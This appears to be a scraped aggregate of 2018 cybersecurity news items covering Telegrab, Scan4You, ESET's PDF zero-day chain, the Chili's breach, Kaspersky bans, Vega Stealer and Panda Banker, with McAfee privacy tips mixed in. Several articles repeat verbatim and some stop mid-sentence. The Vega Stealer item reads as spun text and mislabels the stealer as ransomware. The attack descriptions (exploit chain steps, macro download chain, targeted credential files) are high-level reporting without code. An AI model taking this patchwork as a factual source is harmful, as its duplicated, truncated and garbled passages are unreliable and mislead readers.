Now the analysis of the malware revealed it was developed by a Russian-speaking attacker “with high confidence,” the threat actor is mostly targeting Russian-speaking victims.

The malicious code is a variant of the Telegrab malware that was first spotted in the wild on 4 April 2018, it has been designed to harvest cache and key files from Telegram application.

A  second variant of the Telegrab malware emerged on 10 April 2018, the development team appears very active.

While the first variant of the Telegrab malware only stole text files, browser credentials, and cookies, the second version also implements the ability to collect data from Telegram’s desktop cache and Steam login credentials to hijack active Telegram sessions.

Talos researchers discovered that the malicious code is intentionally avoiding IP addresses related to anonymizer services.

“Over the past month and a half, Talos has seen the emergence of a malware that collects cache and key files from end-to-end encrypted instant messaging service Telegram. This malware was first seen on April 4, 2018, with a second variant emerging on April 10.” reads the blog post published by Cisco Talos.

The researchers identified the author behind this malware with high confidence, he posted several YouTube videos tutorial for the Telegrab malware.
The operators of this malware use several pcloud.com hardcoded accounts to store the exfiltrated data, the experts noticed that stolen info is not encrypted allowing anyone with access to these account credentials to access the exfiltrated data.

“Telegram session hijacking is the most interesting feature of this malware, even with limitations this attack does allow the session hijacking and with it, the victims’ contacts and previous chats are compromised,” says the Talos team.

The malicious code searches the hard drives on Windows targets for Chrome credentials, session cookies, and text files, which get zipped and uploaded to pcloud.com.

Cisco Talos researchers blame “weak default settings” on the Telegram Desktop version, the Telegrab malware, in fact, abuses the lack of Secret Chats that are not implemented on the desktop version of the popular application.

Cisco Talos experts explained that the Telegrab malware works “by restoring cache and map files into an existing Telegram desktop installation if the session was open.

“In summary, by restoring cache and map files into an existing Telegram desktop installation, if the session was open. It will be possible to access the victim’s session, contacts and previous chats.” continues the post. 

Telegrab Malware

The analysis of the malware allowed the researchers to link it to a user that goes online by the name of Racoon Hacker, also known as Eyenot (Енот / Enot) and Racoon Pogoromist (sic).

The Telegram malware aimed at a surgical operation that can fly under the radar and compromise thousands of credentials in a few time.

Such kind of operations is usually not associated with cybercrime gangs that operate on a larger scale. Stolen credentials and cookies allow the malware operator to access the victim’s information on social media and email services (i.e. vk.com, yandex.com, gmail.com, google.com etc.) that are precious source of information for intelligence gathering.

“This malware should be considered a wakeup call to encrypted messaging systems users. Features which are not clearly explained and bad defaults can put in jeopardy their privacy.” concludes Talos experts.

“When compared with the large bot networks used by large criminal enterprises, this threat can be considered almost insignificant.” 

“The malware samples analysed are not particularly sophisticated but they are efficient. There are no persistence mechanisms, meaning victims execute the malware every time, but not after reboots”.

Pierluigi Paganini

(Security Affairs – Telegrab malware, Telegram)

The post Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files appeared first on Security Affairs.



Security Affairs

Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files

Cisco Talos researchers have spotted a new variant of Telegrab malware designed to collect information from the Desktop version of the popular messaging service Telegram.

Security experts from Cisco Talos group have spotted a new strain of malware that is targeting the desktop version of end-to-end encrypted instant messaging service Telegram.

We all know that Telegram is under attack by Russia’s Media watchdog Roskomnadzor that asked the company to share technical details to access electronic messages shared through the instant messaging app. Last month, the Russian authorities blocked the Telegram app in the country because the company refused to hand over encryption keys of its users to Federal Security Service (FSB) of Russia for investigation purposes.

Now the analysis of the malware revealed it was developed by a Russian-speaking attacker “with high confidence,” the threat actor is mostly targeting Russian-speaking victims.

The malicious code is a variant of the Telegrab malware that was first spotted in the wild on 4 April 2018, it has been designed to harvest cache and key files from Telegram application.

A  second variant of the Telegrab malware emerged on 10 April 2018, the development team appears very active.

While the first variant of the Telegrab malware only stole text files, browser credentials, and cookies, the second version also implements the ability to collect data from Telegram’s desktop cache and Steam login credentials to hijack active Telegram sessions.

Talos researchers discovered that the malicious code is intentionally avoiding IP addresses related to anonymizer services.

“Over the past month and a half, Talos has seen the emergence of a malware that collects cache and key files from end-to-end encrypted instant messaging service Telegram. This malware was first seen on April 4, 2018, with a second variant emerging on April 10.” reads the blog post published by Cisco Talos.

The researchers identified the author behind this malware with high confidence, he posted several YouTube videos tutorial for the Telegrab malware.
The operators of this malware use several pcloud.com hardcoded accounts to store the exfiltrated data, the experts noticed that stolen info is not encrypted allowing anyone with access to these account credentials to access the exfiltrated data.

“Telegram session hijacking is the most interesting feature of this malware, even with limitations this attack does allow the session hijacking and with it, the victims’ contacts and previous chats are compromised,” says the Talos team.

The malicious code searches the hard drives on Windows targets for Chrome credentials, session cookies, and text files, which get zipped and uploaded to pcloud.com.

Cisco Talos researchers blame “weak default settings” on the Telegram Desktop version, the Telegrab malware, in fact, abuses the lack of Secret Chats that are not implemented on the desktop version of the popular application.

Cisco Talos experts explained that the Telegrab malware works “by restoring cache and map files into an existing Telegram desktop installation if the session was open.

“In summary, by restoring cache and map files into an existing Telegram desktop installation, if the session was open. It will be possible to access the victim’s session, contacts and previous chats.” continues the post. 

Telegrab Malware

The analysis of the malware allowed the researchers to link it to a user that goes online by the name of Racoon Hacker, also known as Eyenot (Енот / Enot) and Racoon Pogoromist (sic).

The Telegram malware aimed at a surgical operation that can fly under the radar and compromise thousands of credentials in a few time.

Such kind of operations is usually not associated with cybercrime gangs that operate on a larger scale. Stolen credentials and cookies allow the malware operator to access the victim’s information on social media and email services (i.e. vk.com, yandex.com, gmail.com, google.com etc.) that are precious source of information for intelligence gathering.

“This malware should be considered a wakeup call to encrypted messaging systems users. Features which are not clearly explained and bad defaults can put in jeopardy their privacy.” concludes Talos experts.

“When compared with the large bot networks used by large criminal enterprises, this threat can be considered almost insignificant.” 

“The malware samples analysed are not particularly sophisticated but they are efficient. There are no persistence mechanisms, meaning victims execute the malware every time, but not after reboots”.

Pierluigi Paganini

(Security Affairs – Telegrab malware, Telegram)

The post Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files appeared first on Security Affairs.

Get Your Online Privacy Under Control

Online privacy: too often managing this aspect of our digital lives gets shuffled to the bottom of our ‘to-do’ lists. The recent Facebook Cambridge Analytica drama made many of us rethink what private information we are sharing online. But many of us just don’t know what to do to fix it.

This week is Privacy Awareness Week – a great opportunity to check-in and see how we can do better. A recent survey conducted by McAfee shows that most Aussies (54%) are more concerned about their online privacy than five years ago. This is encouraging! However, a whopping 83% of us do not believe that protecting our internet-connected devices is essential to managing our privacy online. Oh dear!! ☹

The survey also showed that 23% of Aussies do not change default passwords when we purchase new devices and that only 35% of us know how to properly check if our connected home appliances or devices are secured. Clearly we still have work to do, people! We have a disconnect on our hands. Most of us realise we need to do something to manage our privacy but don’t realise that protecting our devices is a big part of the solution. You can’t have one without the other!!!

Online Privacy Made Easier

So, I’m going to make it nice and easy for you. I have compiled a list of the steps you need to take to get your online privacy under control. And yes, it may take you a few hours to get on top of it but it’s so worth it. If your privacy is compromised, your identity can be easily stolen. Which could affect you financially as well as undermine your reputation. Let’s get to it – here’s what you need to do:

 1. Protect Your Devices

  • Use comprehensive security software such as McAfee® Total Protection. You know it will guard you against viruses and threats. But do you realise it will also direct you away from dangerous downloads and risky websites – where privacy can easily come unstuck!
  • McAfee® Total Protection will also protect your smartphone and tablet, and can back up your important files.

 2. Manage Your Passwords

  • Ensure all your online accounts and all your devices have a separate, unique password. Ideally, it should have a combination of lower and upper case letters, numbers and special characters. I love using a nonsensical, crazy sentence.

 3. Think Before You Download Apps

  • Never download apps from unknown sources. They may be designed to mine your personal information. Always read reviews to see if anyone has had a problem and check out the app’s fine print before you download.
  • Review the apps that you have signed up to with Facebook. As you would be aware from the recent Cambridge Analytica situation, Facebook provides some of these apps with user’s private information including name, location, email or even friends list.
    So, please review these apps, people. Not sure where to start? Go to Settings > Apps > Logged in with Facebook and remove anything that doesn’t absolutely need access to your Facebook profile. You will still have to contact the app developer to ensure they have deleted the data they already have gathered on you.

 4. Lock Down Your Home Wi-Fi

  • To prevent hackers accessing your fleet of IoT devices at home (including your virtual assistant or your lighting or security systems), secure your home Wi-Fi with a complex password. All device passwords need to have their default passwords changed as well.
  • McAfee’s Secure Home Platform – available soon on D-Link – can secure devices through your internet router to ensure every internet-connected device in your house is safe. How good is that???

 5. Stay On Top Of Software Updates

  • Check all your devices to ensure your software (operating systems, apps) is up-to-date.
  • Out-of-date software often means there is a security vulnerability that makes it so much easier for a cybercriminal to access your device and online life.
  • Why not schedule updates so this happens automatically?

 6. Be Wary Using Wi-Fi Outside Home Or Work

  • Avoid using public or unsecured Wi-Fi, especially when entering personal information online, as it can leave you open to all sorts of nasty attacks.
  • Use a Virtual Private Network (VPN) such as McAfee® Safe Connect to encrypt connections and keep your data secure when sharing online.

 7. Multi-Factor Authentication

And don’t forget about your kids! Teaching them the importance of proactively managing their online privacy is essential. As parents, we need to help our kids develop a toolkit of skills and knowledge, so they can prepare themselves for life’s challenges. So please share this with them – you’ll be doing them a big favour.

Alex x

The post Get Your Online Privacy Under Control appeared first on McAfee Blogs.

McAfee Blogs: Get Your Online Privacy Under Control

Online privacy: too often managing this aspect of our digital lives gets shuffled to the bottom of our ‘to-do’ lists. The recent Facebook Cambridge Analytica drama made many of us rethink what private information we are sharing online. But many of us just don’t know what to do to fix it.

This week is Privacy Awareness Week – a great opportunity to check-in and see how we can do better. A recent survey conducted by McAfee shows that most Aussies (54%) are more concerned about their online privacy than five years ago. This is encouraging! However, a whopping 83% of us do not believe that protecting our internet-connected devices is essential to managing our privacy online. Oh dear!! ☹

The survey also showed that 23% of Aussies do not change default passwords when we purchase new devices and that only 35% of us know how to properly check if our connected home appliances or devices are secured. Clearly we still have work to do, people! We have a disconnect on our hands. Most of us realise we need to do something to manage our privacy but don’t realise that protecting our devices is a big part of the solution. You can’t have one without the other!!!

Online Privacy Made Easier

So, I’m going to make it nice and easy for you. I have compiled a list of the steps you need to take to get your online privacy under control. And yes, it may take you a few hours to get on top of it but it’s so worth it. If your privacy is compromised, your identity can be easily stolen. Which could affect you financially as well as undermine your reputation. Let’s get to it – here’s what you need to do:

 1. Protect Your Devices

  • Use comprehensive security software such as McAfee® Total Protection. You know it will guard you against viruses and threats. But do you realise it will also direct you away from dangerous downloads and risky websites – where privacy can easily come unstuck!
  • McAfee® Total Protection will also protect your smartphone and tablet, and can back up your important files.

 2. Manage Your Passwords

  • Ensure all your online accounts and all your devices have a separate, unique password. Ideally, it should have a combination of lower and upper case letters, numbers and special characters. I love using a nonsensical, crazy sentence.

 3. Think Before You Download Apps

  • Never download apps from unknown sources. They may be designed to mine your personal information. Always read reviews to see if anyone has had a problem and check out the app’s fine print before you download.
  • Review the apps that you have signed up to with Facebook. As you would be aware from the recent Cambridge Analytica situation, Facebook provides some of these apps with user’s private information including name, location, email or even friends list.
    So, please review these apps, people. Not sure where to start? Go to Settings > Apps > Logged in with Facebook and remove anything that doesn’t absolutely need access to your Facebook profile. You will still have to contact the app developer to ensure they have deleted the data they already have gathered on you.

 4. Lock Down Your Home Wi-Fi

  • To prevent hackers accessing your fleet of IoT devices at home (including your virtual assistant or your lighting or security systems), secure your home Wi-Fi with a complex password. All device passwords need to have their default passwords changed as well.
  • McAfee’s Secure Home Platform – available soon on D-Link – can secure devices through your internet router to ensure every internet-connected device in your house is safe. How good is that???

 5. Stay On Top Of Software Updates

  • Check all your devices to ensure your software (operating systems, apps) is up-to-date.
  • Out-of-date software often means there is a security vulnerability that makes it so much easier for a cybercriminal to access your device and online life.
  • Why not schedule updates so this happens automatically?

 6. Be Wary Using Wi-Fi Outside Home Or Work

  • Avoid using public or unsecured Wi-Fi, especially when entering personal information online, as it can leave you open to all sorts of nasty attacks.
  • Use a Virtual Private Network (VPN) such as McAfee® Safe Connect to encrypt connections and keep your data secure when sharing online.

 7. Multi-Factor Authentication

And don’t forget about your kids! Teaching them the importance of proactively managing their online privacy is essential. As parents, we need to help our kids develop a toolkit of skills and knowledge, so they can prepare themselves for life’s challenges. So please share this with them – you’ll be doing them a big favour.

Alex x

The post Get Your Online Privacy Under Control appeared first on McAfee Blogs.



McAfee Blogs

TrendLabs Security Intelligence Blog: Operators of Counter Antivirus Service Scan4You Sentenced

In May 2017, one of the biggest facilitators of cybercrime, Scan4You, went offline after the two main suspects, Ruslans Bondars and Jurijs Martisevs, were arrested in Latvia and extradited to the U.S. by the Federal Bureau of Investigation (FBI). In May 2018, the case against the Scan4You’s operators concluded in a Virginia federal courtroom.

The Trend Micro Forward-Looking Threat Research (FTR) team started to look into Scan4You’s operations in 2012, and have been in close contact with FBI investigators assigned to the case since 2014. Our research on Scan4You spanned more than five years, passing some of our findings to the FBI until the service went offline.

What is Scan4You?
Scan4You is a counter antivirus (CAV) service that lets cybercriminals check the detection of their latest malware against most modern antivirus (AV) engines. This service helps cybercriminals make their malware campaigns more effective because they can tweak and test their malware to reduce detection rates.

Since CAV services like Scan4You make it easier for a budding actor to climb the cybercriminal career ladder, stopping such a large CAV service is an important preventive measure to make it more difficult for young actors to venture into cybercrime. Stopping these services also helps increase the costs of malware campaigns of more experienced actors who appear to be using CAV services. Finally, putting a stop to these types of services also sends a strong message to the underground that facilitating cybercrime can lead to arrests and prosecution.

Scan4You’s operators were also involved in other cybercriminal activities
Using a CAV service means that a malicious actor trusts it. It is therefore not a surprise that Scan4You’s owners had an established reputation as cybercriminals themselves. Scan4You’s operators have been around since at least 2006 and were affiliated with some of the longest-running cybercriminal businesses.

They did not just run a CAV service. They were also involved in one of the largest and oldest pharmaceutical spam gangs known as Eva Pharmacy. The group is infamous for the illegal sales of prescription drugs that they carefully marketed through spam and search engine optimization. They were also involved in the spread of banking malware like SpyEye and ZeuS. Scan4You used the corporate network of a Latvian Internet Service Provider (ISP) for many years and Ruslans Bondars worked for a Latvian software development company related to a variety of websites, including one that got fined for misleading advertisements and fraud in 2010.

Delving into Scan4You’s activities
Scan4You’s website claims that they don’t share information on the scans with internet security companies like Trend Micro. Evidently, this wasn’t entirely true. While Scan4You made sure feedback loops to Trend Micro’s servers about file scans were turned off, Scan4You also performed reputation checks of URLs, IP addresses, and domains. The way Scan4You set this up meant that all reputation scans against Trend Micro’s web reputation service were visible to us for years. Since 2012, we have collected a wealth of information on Scan4You’s operations, and in particular, information on the many reputation scans that they performed each day. A malware author would usually check the reputation of his landing pages or command and control (C&) servers on Scan4You just before he starts a new campaign. We were able to observe these checks, and in many cases, we could preemptively block the new malicious domains before they could use them.

Other large CAV services like VirusCheckMate and AVDetect also turned off feedback loops on file scans, but we received their reputation scans of IP addresses, URLs, and domain names. This made it possible for us to estimate their market shares. Throughout the years, Scan4You was always the biggest known CAV service.


Comparison of URL scans by Scan4You (S4Y), VirusCheckMate (VCM), and AVDetect (AVD) in 2015; there is no vertical scale as we only have sampled data
(Source: Trend Micro™ Smart Protection Network™).

Proactive collaboration with law enforcement
This is the second time Trend Micro has helped stop a CAV service. Trend Micro also assisted with the investigation against Refud.me, a medium-sized CAV service that used Scan4You’s application programming interface (API). Refud.me’s owner was arrested in 2015, and the court case was concluded in 2018.

Scan4You was the largest known CAV service. When it went offline, we expected to see a lot of its users to move to the only major CAV that was still online: VirusCheckMate. However, our data shows that there was no significant growth in the number of web reputation scans done at VirusCheckMate after May 2017. It appears most of Scan4You’s users stopped using a public CAV service.

The arrests of Scan4You operators Ruslans Bondars and Jurijs Martisevs send an important message to the cybercriminal underground. Not only is deploying or authoring malware that victimizes innocent targets a crime. In at least some jurisdictions, it’s also a crime to help others carry out these offenses. Thanks to the years of work done by Trend Micro and the FBI that led to their arrests, we take one more step forward in securing today’s connected world.

Read more about our research about the largest CAV service in the underground, its operators, and the ties that bind Scan4You to other cybercriminals: The Rise and Fall of Scan4You.

The post Operators of Counter Antivirus Service Scan4You Sentenced appeared first on .



TrendLabs Security Intelligence Blog

New Threat Intelligence Reveals That Simple Cyberthreats Remain Successful

Despite the rise of Internet of Things (IoT) networks and always-connected mobile devices, cybercriminals are sticking with tried-and-true strategies.

As noted by BetaNews, email phishing and drive-by downloads were the most common threat vectors of 2017, maintaining their top spots from the year before. New threat intelligence data also revealed a threefold increase in ransomware over the last year fueled in large part by variants such as NotPetya and WannaCry.

Industry Cybercrime Trends

ZDNet reported that healthcare was the primary target for ransomware scams last year. In fact, 8 of the top 10 ransomware families were consistently involved in healthcare attacks.

The food industry, meanwhile, topped threat actors’ priority list and attracted 50 percent of all reported attacks, down just 1 percent from 2016, according to the “Cylance 2017 Threat Report.” In 2017, hospitality moved into second spot with 19 percent.

On the attacker side of threat intelligence, the market is shifting gears to offer ransomware-as-a-service (RaaS) tools that would-be cybercriminals can purchase for less than $50. The authors simply take a percentage of any successful ransomware scheme.

Threat Actors Keep It Simple

As noted by the Cylance report, simple techniques, such as phishing, and common malware strains, such as Locky, continue to pay off for attackers. Reported but unpatched vulnerabilities are one problem: With multiple malware strains now available for a reasonable price, malicious actors can easily find software designed to exploit known issues.

Also consider the use of Locky ransomware, which remains largely unchanged since its inception. According to the report, “This old malware didn’t need to take a new approach. The authors behind Locky just had to tweak the only part of the process that can never be fixed — the end user.”

Despite the success of tried-and-true attacks, however, Forbes pointed out that there’s also an uptick in “single-use, highly targeted malware attacks.” This code is designed to carry out a singular purpose on corporate networks and isn’t active in the wild. Instead, it activates once and only once to complete its assigned task.

In fact, 70 percent of the attacked blocked by Cylance were never seen again. As a result, existing lists of malicious code, such as CVE, won’t list this kind of custom-built malware, making it possible for attackers to act with greater impunity. The Cylance report put it simply: “The fact of the matter is that public repositories of signatures are by no means comprehensive, complete, up to date or a reliable record of all the malware that could impact an organization.”

In addition, crypto-mining efforts are gaining ground since many security tools don’t recognize this lightweight software as threatening and visible impact to networks is often minimal. As noted by the Cylance report, crypto-mining tools saw a 504 percent boost through 2017 and are on track for similar growth this year.

Threat Intelligence Takeaway

While more threat actors are designing custom-built malware to beat corporate defenses, the bulk of attacks leverage well-known ransomware tools and common threat vectors. Phishing and drive-by downloads continue to work as employees struggle to identify scam email efforts and malicious links, while the rise of crypto-mining tools reduces the complexity of new attacks.

The bottom line is that while sophisticated software is on the rise, simple remains successful for malicious actors.

The post New Threat Intelligence Reveals That Simple Cyberthreats Remain Successful appeared first on Security Intelligence.

Mysterious hackers ingenuously reveal two Zero-Days to security community

Mysterious hackers ingenuously reveal two zero-days to the security community, experts collaborated to promptly fix them.

Anton Cherepanov, security expert form ESET researcher, discovered two zero-days while analyzing a malicious PDF, according to the researcher the mysterious hacker(s) were still working on the exploits.

The malicious PDF was discovered late in March 2018 (Two suspicious PDF samples zero-day 1zero-day 2), the analysis of the document revealed it was exploiting two previously unknown vulnerabilities, a remote-code execution vulnerability in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs.

The two zero-days were tracked as CVE-2018-4990, that affected Adobe Acrobat/Reader PDF viewer, and as CVE-2018-8120 that affected the Win32k component of Windows.

By chaining the two vulnerabilities it was possible to escape the Adobe’s sandbox protection and execute arbitrary code inside Adobe Acrobat/Reader.

“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

Below the steps composing the attack chain:

  • The victim receives and opens a weaponized PDF file
  • Once the user opened the PDF, a malicious JavaScript code will execute.
  • JavaScript code manipulates a button object
  • The Button object contains a specially-crafted JPEG2000 image, triggers a double-free vulnerability in Adobe Acrobat/Reader.
  • JavaScript code uses heap-spray techniques to obtain read and write memory access
  • JavaScript code then interacts with Adobe Reader’s JavaScript engine
  • The attacker uses the engine’s native assembly instructions (ROP gadgets) to execute its own native shellcode.
  • Shellcode initializes a PE file embedded in the PDF
  • Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.

Even if the chain of the zero-days could be very dangerous, the developers allowed the security community to detect them by uploading it to a known virus scanning engine aiming to test its evasion capability.

zero-days exploits

The two zero-days have been already patched, Microsoft addressed the CVE-2018-8120 with the release of the May 2018 Patch Tuesday, Adobe patched the CVE-2018-4990 this week.
“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.
“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Pierluigi Paganini

(Security Affairs – zero-days, hacking)

The post Mysterious hackers ingenuously reveal two Zero-Days to security community appeared first on Security Affairs.

Security Affairs: Mysterious hackers ingenuously reveal two Zero-Days to security community

Mysterious hackers ingenuously reveal two zero-days to the security community, experts collaborated to promptly fix them.

Anton Cherepanov, security expert form ESET researcher, discovered two zero-days while analyzing a malicious PDF, according to the researcher the mysterious hacker(s) were still working on the exploits.

The malicious PDF was discovered late in March 2018 (Two suspicious PDF samples zero-day 1zero-day 2), the analysis of the document revealed it was exploiting two previously unknown vulnerabilities, a remote-code execution vulnerability in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs.

The two zero-days were tracked as CVE-2018-4990, that affected Adobe Acrobat/Reader PDF viewer, and as CVE-2018-8120 that affected the Win32k component of Windows.

By chaining the two vulnerabilities it was possible to escape the Adobe’s sandbox protection and execute arbitrary code inside Adobe Acrobat/Reader.

“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

Below the steps composing the attack chain:

  • The victim receives and opens a weaponized PDF file
  • Once the user opened the PDF, a malicious JavaScript code will execute.
  • JavaScript code manipulates a button object
  • The Button object contains a specially-crafted JPEG2000 image, triggers a double-free vulnerability in Adobe Acrobat/Reader.
  • JavaScript code uses heap-spray techniques to obtain read and write memory access
  • JavaScript code then interacts with Adobe Reader’s JavaScript engine
  • The attacker uses the engine’s native assembly instructions (ROP gadgets) to execute its own native shellcode.
  • Shellcode initializes a PE file embedded in the PDF
  • Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.

Even if the chain of the zero-days could be very dangerous, the developers allowed the security community to detect them by uploading it to a known virus scanning engine aiming to test its evasion capability.

zero-days exploits

The two zero-days have been already patched, Microsoft addressed the CVE-2018-8120 with the release of the May 2018 Patch Tuesday, Adobe patched the CVE-2018-4990 this week.
“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.
“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Pierluigi Paganini

(Security Affairs – zero-days, hacking)

The post Mysterious hackers ingenuously reveal two Zero-Days to security community appeared first on Security Affairs.



Security Affairs

Chili’s hit by malware, payment card data stolen

Chili’s customers may have fallen victim to a malware attack that affected a number of credit and debit cards used in several restaurants, confirmed parent company Brinker International on Saturday. The malware allegedly collected not only payment card details, but also customers’ names. Because Chili’s does not collect Social Security numbers, full dates of birth or federal ID data, these were not compromised.

Brinker brought in an external forensic team to investigate the incident, but so far it is believed the attack took place between March and April. Also, the company said, simply because customers used their cards in the affected facilities does not mean their data was exposed. The investigation will determine who is responsible and how the incident actually took place.

“On May 11, 2018, we learned that some of our Guests’ payment card information was compromised at certain Chili’s restaurants as the result of a data incident,” said Brinker International in a press release. “Currently, we believe the data incident was limited to between March – April 2018; however, we continue to assess the scope of the incident. We deeply value our relationships with our Guests and sincerely apologize to those who may have been affected.”

As the breach was detected on Friday, customers are strongly advised to check their bank statements for illegal transactions and to immediately contact their bank if fraud is suspected. Brinker offers free credit monitoring and fraud resolution for customers whose payment card data was stolen.

It seems hackers have made a habit of going after popular restaurants, shops and hotel chains, as Sears, Kmart, Whole Foods, Under Armour, Home Depot and Target have also suffered security breaches recently. So far there’s no evidence to suggest the data stolen from Chili’s has been put on sale on the dark web.

Dutch Government plans to phase out the use of Kaspersky solutions

Dutch Government plans to phase out the use of Kaspersky solutions while the security firm confirmed that its code infrastructure is going to move to Switzerland.

The antivirus firm Kaspersky Lab made the headlines again, the company confirmed that its code infrastructure is going to move to Switzerland. The news arrives just after the comment from the Netherlands government of the risks associated with the usage of Kaspersky Lab software.

Dutch government announced on Monday it plans to phase out the use of anti-virus software developed by Kaspersky Labs “as a precautionary measure” and recommending companies involved in the protection of critical infrastructure to do the same.

Dutch Government fear the aggressive Russian cyber strategy cyber that targets among others the country interests.

“In a letter to parliament, Justice Minister Ferdinand Grapperhaus said the decision was made because the Russian government had an “offensive cyber programme that targets among others the Netherlands and Dutch interests”.” reported The New York Times.

“He also said Moscow-based Kaspersky was subject to Russian laws that could oblige it to comply with Russian state interests.”

In response to the accusations from several governments, Kaspersky is moving a number of its core activities from Russia to Switzerland as part of its “Global Transparency Initiative.” It has been estimated that the overall costs of the transfer are $12m.

“The (Dutch) cabinet has carried out an independent review and analysis and made a careful decision on that basis,” Grapperhaus said. “Although there are no concrete cases of misuse known in the Netherlands, it cannot be excluded.”

Grapperhaus explained the Dutch government would consider revising the decision “if circumstances justify” doing so.

The U.S. DHS ban on the use of Kaspersky software by the U.S. Federal government in 2017, while Kaspersky continues to deny any cooperation with Russian intelligence,

Britain’s National Cyber Security Centre for agencies and organizations also suggests avoiding the usage of Kaspersky solutions for the protection of systems that manage classified information.

In December, Lithuania announced it will ban the products of the cybersecurity giant Kaspersky from computers in critical infrastructure.

In April, Twitter banned Kaspersky from advertising on its platform citing DHS ban for its alleged ties with Russian intelligence agencies.

Pierluigi Paganini

(Security Affairs – Kaspersky, Dutch Government)

The post Dutch Government plans to phase out the use of Kaspersky solutions appeared first on Security Affairs.

New Malware Variant Designed To Swindle Financial Data from Google Chrome and Firefox Browsers



Researchers have as of late discovered Vega Stealer a malware that is said to have been created in order to harvest financial information from the saved credentials of Google Chrome and Mozilla Firefox browsers.

At present,  the Vega Stealer is just being utilized as a part of small phishing campaigns, however researchers believe that the malware can possibly bring about major hierarchical level attacks as it is just another variation of August Stealer crypto-malware that steals credentials, sensitive documents, cryptocurrency wallets, and different subtle elements put away in the two browsers.

On May 8 this year, the researchers observed and obstructed a low-volume email campaign with subjects, for example, 'Online store developer required'. The email comes with an attachment called 'brief.doc', which contains noxious macros that download the Vega Stealer payload.

The Vega Stealer ransomware supposedly focuses on those in the marketing, advertising, public relations, and retail/ manufacturing industries. Once the document is downloaded and opened, a two-step download process begins.

The report said "...The first request executed by the document retrieves an obfuscated JScript/PowerShell script. The execution of the resulting PowerShell script creates the second request, which in turn downloads the executable payload of Vega Stealer, the payload is then saved to the victim machine in the user's "Music" directory with a filename of 'ljoyoxu.pkzip' and once this file is downloaded and saved, and it is executed automatically via the command line."

At the point when the Firefox browser is in utilization, the malware assembles particular documents having different passwords and keys, for example, "key3.db" "key4.db", "logins.json", and "cookies.sqlite".

Other than this, the malware likewise takes a screenshot of the infected machine and scans for any records on the framework finishing off with .doc, .docx, .txt, .rtf, .xls, .xlsx, or .pdf for exfiltration.
While the researchers couldn't ascribe Vega Stealer to any particular group, regardless they guarantee that the document macro and URLs associated with the crusade propose that a similar threat actor is responsible for campaigns spreading financial malware.

So as to be protected, Ankush Johar, Director at Infosec Ventures, in a press statement said that "...Organisations should take cyber awareness seriously and make sure that they train their consumers and employees with what malicious hackers can do and how to stay safe from these attacks. One compromised system is sufficient to jeopardize the security of the entire network connected with that system."

Because while Vega Stealer isn't the most complex malware in use today, but it does demonstrates the adaptability and flexibility of malware, authors, and actors to accomplish criminal objectives.


The FBI’s 10 Most-Wanted Black-Hat Hackers – #5, #4 and #3

This week in Tripwire’s countdown of the FBI’s 10 most-wanted black-hat hackers, we name three hackers bound together in digital crime: Wen Xinyu, Huang Zhenyu and Sun Kailiang. The suspects made headlines in May 2014 when the United States Department of Justice indicted five suspected Chinese nationals for allegedly committing economic and cyber espionage against […]… Read More

The post The FBI’s 10 Most-Wanted Black-Hat Hackers – #5, #4 and #3 appeared first on The State of Security.

Is the C-suite exempt from cyber-crime anxiety?

If recent cyber-attacks are anything to go by, cyber-criminals are capable of causing colossal damage to organisations of all sizes. With vital public services such as the NHS succumbing to

The post Is the C-suite exempt from cyber-crime anxiety? appeared first on The Cyber Security Place.

Crypto-Mining Malware Tops Most Wanted List

Cybercriminals have options when it comes to choosing their attack weapons, which is why malware authors are likely grateful to those criminals who choose to target unpatched server vulnerabilities with

The post Crypto-Mining Malware Tops Most Wanted List appeared first on The Cyber Security Place.

PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media

 

Security firm F5 detailed recently discovered campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.

Researchers at security firm F5 recently detected several campaigns leveraging the Panda Banker malware to target financial institution, the largest one aimed the banks in the US.

In March, security researchers at Arbor Networks discovered a threat actor targeting financial institutions in Japan using the latest variant of the Panda Banker banking malware (aka Zeus Panda, PandaBot).

